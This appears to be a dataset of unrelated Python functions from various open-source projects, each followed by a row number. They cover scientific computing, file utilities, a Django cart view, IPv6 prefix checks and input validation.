def get_example_models(): """Generator that yields the model objects for all example models""" example_dir = os.path.join(os.path.dirname(__file__), '..', 'examples') for filename in os.listdir(example_dir): if filename.endswith('.py') and not filename.startswith('run_') \ and not filename.startswith('__'): modelname = filename[:-3] # strip .py package = 'pysb.examples.' + modelname module = importlib.import_module(package) # Reset do_export to the default in case the model changed it. # FIXME the self-export mechanism should be more self-contained so # this isn't needed here. SelfExporter.do_export = True yield module.model
29,480
def check_dtype(array, allowed): """Raises TypeError if the array is not of an allowed dtype. :param array: array whose dtype is to be checked :param allowed: instance or list of allowed dtypes :raises: TypeError """ if not hasattr(allowed, "__iter__"): allowed = [allowed, ] if array.dtype not in allowed: msg = "Invalid dtype {}. Allowed dtype(s): {}" raise(TypeError(msg.format(array.dtype, allowed)))
29,481
def initPeaksFromControlPoints(peakSelectionModel, controlPoints, context=None): """Initialize peak selection model using control points object :rtype: pyFAI.control_points.ControlPoints """ if not isinstance(peakSelectionModel, PeakSelectionModel): raise TypeError("Unexpected model type") if not isinstance(controlPoints, ControlPoints): raise TypeError("Unexpected model type") if context is None: context = CalibrationContext.instance() peakSelectionModel.clear() for label in controlPoints.get_labels(): group = controlPoints.get(lbl=label) color = context.getMarkerColor(group.ring) points = numpy.array(group.points) peakModel = createRing(points, peakSelectionModel=peakSelectionModel, context=context) peakModel.setRingNumber(group.ring + 1) peakModel.setColor(color) peakModel.setName(label) peakSelectionModel.append(peakModel)
29,482
def _ros_group_rank(df, dl_idx, censorship): """ Ranks each observation within the data groups. In this case, the groups are defined by the record's detection limit index and censorship status. Parameters ---------- df : pandas.DataFrame dl_idx : str Name of the column in the dataframe the index of the observations' corresponding detection limit in the `cohn` dataframe. censorship : str Name of the column in the dataframe that indicates that a observation is left-censored. (i.e., True -> censored, False -> uncensored) Returns ------- ranks : numpy.array Array of ranks for the dataset. """ # (editted for pandas 0.14 compatibility; see commit 63f162e # when `pipe` and `assign` are available) ranks = df.copy() ranks.loc[:, 'rank'] = 1 ranks = ( ranks.groupby(by=[dl_idx, censorship])['rank'] .transform(lambda g: g.cumsum()) ) return ranks
29,483
def f_all(predicate, iterable): """Return whether predicate(i) is True for all i in iterable >>> is_odd = lambda num: (num % 2 == 1) >>> f_all(is_odd, []) True >>> f_all(is_odd, [1, 3, 5, 7, 9]) True >>> f_all(is_odd, [2, 1, 3, 5, 7, 9]) False """ return all(predicate(i) for i in iterable)
29,484
def vcpu_affinity_output(vm_info, i, config): """ Output the vcpu affinity :param vminfo: the data structure have all the xml items values :param i: the index of vm id :param config: file pointor to store the information """ if vm_info.load_order[i] == "SOS_VM": return cpu_bits = vm_info.get_cpu_bitmap(i) print("\t\t.vcpu_num = {}U,".format(cpu_bits['cpu_num']), file=config) print("\t\t.vcpu_affinity = VM{}_CONFIG_VCPU_AFFINITY,".format(i), file=config)
29,485
def _recursive_replace(data): """Searches data structure and replaces 'nan' and 'inf' with respective float values""" if isinstance(data, str): if data == "nan": return float("nan") if data == "inf": return float("inf") if isinstance(data, List): return [_recursive_replace(v) for v in data] if isinstance(data, Tuple): return tuple([_recursive_replace(v) for v in data]) if isinstance(data, Set): return set([_recursive_replace(v) for v in data]) if isinstance(data, Dict): return {k: _recursive_replace(v) for k, v in data.items()} return data
29,486
def m3_change_emotion(rosebot, emotionnum): """ This is a callable function to change the emotion of the robot from an entry without crashing if the number is too large :type rosebot: rb.RoseBot :param emotionnum: :return: """ if emotionnum < 7: rosebot.m3_emotion_system.change_emotion(emotionnum) else: print("You picked a number which was too large")
29,487
def user(request, user_id): """Displays a User and various information about them.""" raise NotImplementedError
29,488
def test_add_alternative_cds(): """Test get_alternative_cds from CDS class""" cds_list[0].add_alternative_cds(cds_list[1]) assert len(cds_list[0].alternative_cds) == 1
29,489
def trans_text_ch_to_vector(txt_file, word_num_map, txt_label=None): """ Trans chinese chars to vector :param txt_file: :param word_num_map: :param txt_label: :return: """ words_size = len(word_num_map) to_num = lambda word: word_num_map.get(word.encode('utf-8'), words_size) if txt_file != None: txt_label = get_ch_lable(txt_file) labels_vector = list(map(to_num, txt_label)) return labels_vector
29,490
def adjust_bag(request, item_id): """ Adjust the quantity of a product to the specified amount""" quantity = int('0'+request.POST.get('quantity')) bag = request.session.get('bag', {}) if quantity > 0: bag[item_id] = quantity else: messages.error(request, 'Value must greather than or equal to 1.\ If you do not need this product, click on the Remove button.') request.session['bag'] = bag return redirect(reverse('view_bag'))
29,491
def get_file_paths_in_dir(idp, ext=None, target_str_or_list=None, ignore_str_or_list=None, base_name_only=False, without_ext=False, sort_result=True, natural_sorting=False, recursive=False): """ ext can be a list of extensions or a single extension (e.g. ['.jpg', '.png'] or '.jpg') """ if recursive: ifp_s = [] for root, dirs, files in os.walk(idp): ifp_s += [os.path.join(root, ele) for ele in files] else: ifp_s = [os.path.join(idp, ele) for ele in os.listdir(idp) if os.path.isfile(os.path.join(idp, ele))] if ext is not None: if isinstance(ext, list): ext = [ele.lower() for ele in ext] check_ext(ext) ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() in ext] else: ext = ext.lower() check_ext(ext) ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() == ext] if target_str_or_list is not None: if type(target_str_or_list) == str: target_str_or_list = [target_str_or_list] for target_str in target_str_or_list: ifp_s = [ifp for ifp in ifp_s if target_str in os.path.basename(ifp)] if ignore_str_or_list is not None: if type(ignore_str_or_list) == str: ignore_str_or_list = [ignore_str_or_list] for ignore_str in ignore_str_or_list: ifp_s = [ifp for ifp in ifp_s if ignore_str not in os.path.basename(ifp)] if base_name_only: ifp_s = [os.path.basename(ifp) for ifp in ifp_s] if without_ext: ifp_s = [os.path.splitext(ifp)[0] for ifp in ifp_s] if sort_result: if natural_sorting: ifp_s = sorted(ifp_s, key=natural_key) else: ifp_s = sorted(ifp_s) return ifp_s
29,492
def touch(filename): """ Creates an empty file if it does not already exist """ open(filename, 'a').close()
29,493
def test_connected_taskflow(ctx, proxy): """Test a connected taskflow""" # Now try a workflow that is the two connected together logging.info('Running taskflow that connects to parts together ...') taskflow_id = create_taskflow( proxy, 'cumulus.taskflow.core.test.mytaskflows.ConnectTwoTaskFlow') # Start the task flow proxy.put('taskflows/%s/start' % (taskflow_id)) # Wait for it to complete wait_for_taskflow_status(proxy, taskflow_id, 'complete')
29,494
def _condexpr_value(e): """Evaluate the value of the input expression. """ assert type(e) == tuple assert len(e) in [2, 3] if len(e) == 3: if e[0] in ARITH_SET: return _expr_value(e) left = _condexpr_value(e[1]) right = _condexpr_value(e[2]) if type(left) != type(right): # Boolean result expected return False elif e[0] == 'and': return left and right elif e[0] == 'or': return left or right elif e[0] == '=': return left == right elif e[0] == '!=': return left != right elif e[0] == '>': return left > right elif e[0] == '>=': return left >= right elif e[0] == '<': return left < right elif e[0] == '<=': return left <= right elif e[0] == 'not': return not _condexpr_value(e[1]) elif e[0] in ['string', 'number', 'boolean']: return e[1] elif e[0] == 'identifier': return get_config(e[1])['value'] raise Exception("Unexpected depend list: " + str(e))
29,495
def in6_isincluded(addr, prefix, plen): """ Returns True when 'addr' belongs to prefix/plen. False otherwise. """ temp = inet_pton(socket.AF_INET6, addr) pref = in6_cidr2mask(plen) zero = inet_pton(socket.AF_INET6, prefix) return zero == in6_and(temp, pref)
29,496
def check_datepaths(record): """ Asserts that the given date paths return the same number of files, otherwise raises an informative error. """ from .utils import make_date_path_pairs import pandas as pd random_dates = pd.DatetimeIndex( ['2010-04-03', '2010-03-23', '2014-01-01', '2014-01-02'] ) paths = [record['remote']['url'], record['local_store']] if 'pipelines' in record: for key in record['pipelines']: pipe = record['pipelines'][key] paths += (pipe['data_path'],) try: make_date_path_pairs(random_dates, *paths) except AssertionError: raise ConfigError( 'The given paths in the config file do not produce ' 'the same number of output files; e.g. there may be ' 'more URLs than LOCAL_PATHSs. Please check the date ' 'formatting of the following paths: \n' + '\n'.join(paths) )
29,497
def vis_channel(model, layer, channel_n): """ This function creates a visualization for a single channel in a layer :param model: model we are visualizing :type model: lucid.modelzoo :param layer: the name of the layer we are visualizing :type layer: string :param channel_n: The channel number in the layer we are optimizing for :type channel_n: int :return: array of pixel values for the visualization """ print('Getting vis for ' + layer + ', channel ' + str(channel_n)) l_name = dla_lucid.LAYERS[layer][0] obj = objectives.channel(l_name, channel_n) imgs = render.render_vis(model, obj, dla_lucid.PARAM_1D, thresholds=dla_lucid.THRESH_1D, transforms=dla_lucid.TFORMS_1D, verbose=False) imgs_array = np.array(imgs) imgs_reshaped = imgs_array.reshape(400) return imgs_reshaped
29,498
def _validate_fft_input(array: numpy.ndarray) -> None: """ Validate the fft input. Parameters ---------- array : numpy.ndarray Returns ------- None """ if not isinstance(array, numpy.ndarray): raise TypeError('array must be a numpy array') if not numpy.iscomplexobj(array): raise ValueError('array must have a complex data type') if array.ndim != 2: raise ValueError('array must be a two-dimensional array. Got shape {}'.format(array.shape))
29,499